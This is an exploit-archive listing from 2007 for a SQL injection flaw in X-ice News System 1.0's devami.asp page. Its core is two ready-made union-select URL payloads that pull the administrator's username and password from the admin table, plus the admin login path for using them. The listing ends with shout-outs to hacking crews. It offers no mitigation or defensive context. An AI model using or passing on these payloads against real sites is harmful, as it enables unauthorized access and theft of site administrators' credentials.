X-ice News System 1.0 (devami.asp id) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : X-ice News System 1.0 (devami.asp id) SQL Injection Vulnerability
# Published : 2007-03-13
# Author : CyberGhost
# Previous Title : MySQL Commander <= 2.7 (home) Remote File Inclusion Vulnerability
# Next Title : JGBBS 3.0beta1 (search.asp author) SQL Injection Exploit

Title  : X-ice News System v1.0 Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page   : http://www.x-ice.org/haber%5Fv1/
#Download : http://aspindir.com/indir.asp?id=4601&sIslem=%DDndir

Vuln.

Username : /devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
Password : /devami.asp?id=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

Login : /admin/kontrol.asp

====================================

Thanx : redLine - Hackinger - LiarHack - excellance - SaCReD SeeR - MaTRaX - by_emR3 - kerem125 - Bolivar - All TiTHaCK Members

And All TURKISH HACKERS !

# www.Syue.com [2007-03-13]